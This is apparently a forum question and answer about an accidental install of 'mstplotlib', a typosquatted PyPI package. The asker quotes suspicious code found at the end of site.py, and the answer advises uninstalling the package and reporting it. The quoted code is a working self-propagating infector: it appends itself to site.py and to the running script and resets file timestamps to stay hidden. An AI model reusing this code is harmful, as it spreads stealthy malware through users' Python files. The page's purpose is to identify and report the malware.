Menu
When I entered the typo pip install mstplotlib accidentally, the mstplotlib automatically installs its requirement matplotlib and other dependencies, and the installation seems successful.
C:\Users\admin>pip install mstplotlib
Collecting mstplotlib
Downloading mstplotlib-3.10.2.tar.gz (845 bytes)
Preparing metadata (setup.py) ... done
Collecting matplotlib
Downloading matplotlib-3.10.0-cp311-cp311-win_amd64.whl (8.0 MB)
---------------------------------------- 8.0/8.0 MB 1.9 MB/s eta 0:00:00
Collecting contourpy>=1.0.1
Downloading contourpy-1.3.1-cp311-cp311-win_amd64.whl (219 kB)
---------------------------------------- 219.8/219.8 kB 6.8 MB/s eta 0:00:00
Collecting cycler>=0.10
Downloading cycler-0.12.1-py3-none-any.whl (8.3 kB)
Collecting fonttools>=4.22.0
Downloading fonttools-4.56.0-cp311-cp311-win_amd64.whl (2.2 MB)
---------------------------------------- 2.2/2.2 MB 2.4 MB/s eta 0:00:00
Collecting kiwisolver>=1.3.1
Downloading kiwisolver-1.4.8-cp311-cp311-win_amd64.whl (71 kB)
---------------------------------------- 72.0/72.0 kB 3.9 MB/s eta 0:00:00
Collecting numpy>=1.23
Downloading numpy-2.2.3-cp311-cp311-win_amd64.whl (12.9 MB)
---------------------------------------- 12.9/12.9 MB 2.2 MB/s eta 0:00:00
Collecting packaging>=20.0
Downloading packaging-24.2-py3-none-any.whl (65 kB)
---------------------------------------- 65.5/65.5 kB ? eta 0:00:00
Collecting pillow>=8
Downloading pillow-11.1.0-cp311-cp311-win_amd64.whl (2.6 MB)
---------------------------------------- 2.6/2.6 MB 1.8 MB/s eta 0:00:00
Collecting pyparsing>=2.3.1
Downloading pyparsing-3.2.1-py3-none-any.whl (107 kB)
---------------------------------------- 107.7/107.7 kB 2.1 MB/s eta 0:00:00
Collecting python-dateutil>=2.7
Downloading python_dateutil-2.9.0.post0-py2.py3-none-any.whl (229 kB)
---------------------------------------- 229.9/229.9 kB 4.7 MB/s eta 0:00:00
Collecting six>=1.5
Downloading six-1.17.0-py2.py3-none-any.whl (11 kB)
Installing collected packages: six, pyparsing, pillow, packaging, numpy, kiwisolver, fonttools, cycler, python-dateutil, contourpy, matplotlib, mstplotlib
DEPRECATION: mstplotlib is being installed using the legacy 'setup.py install' method, because it does not have a 'pyproject.toml' and the 'wheel' package is not installed. pip 23.1 will enforce this behaviour change. A possible replacement is to enable the '--use-pep517' option. Discussion can be found at https://github.com/pypa/pip/issues/8559
Running setup.py install for mstplotlib ... done
Successfully installed contourpy-1.3.1 cycler-0.12.1 fonttools-4.56.0 kiwisolver-1.4.8 matplotlib-3.10.0 mstplotlib-3.10.2 numpy-2.2.3 packaging-24.2 pillow-11.1.0 pyparsing-3.2.1 python-dateutil-2.9.0.post0 six-1.17.0
However, as I attemped to refer to the source of site.py, there are some suspicious codes at the end of site.py source file, but I don't know the goals of that:
mark="#####MyPython####"#v1.1.2
code=''
with open(__file__,encoding="utf-8") as f:
for line in f:
if mark in line.strip():
code=line+f.read()
def spread(file):
import os;stat=os.stat(file)
old_time=stat.st_atime,stat.st_mtime
with open(file,'r',encoding='utf-8') as f:
for line in f:
if mark in line:return
if os.path.getsize(file)>=2560:
with open(file,'a',encoding='utf-8') as f:
f.write('\n'+code)
os.utime(file,old_time)
try:
spread(__import__("site").__file__)
spread(__import__("sys").argv[0])
except:pass
del spread,code,mark,f,line
Additionally, I'm not certain whether the code is brought by mstplotlib, or not.
311
asked Nov 21 '25 21:11
There is mstplotlib on PyPI but this project has no description provided and no repository specified. Almost no information exists about it. I would wonder why its dependencies are maintained packages.
Kindly take the step @phd mentioned in the comments, remove the package from your environment, login to your PyPI account and report project.
137
answered Nov 24 '25 10:11
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With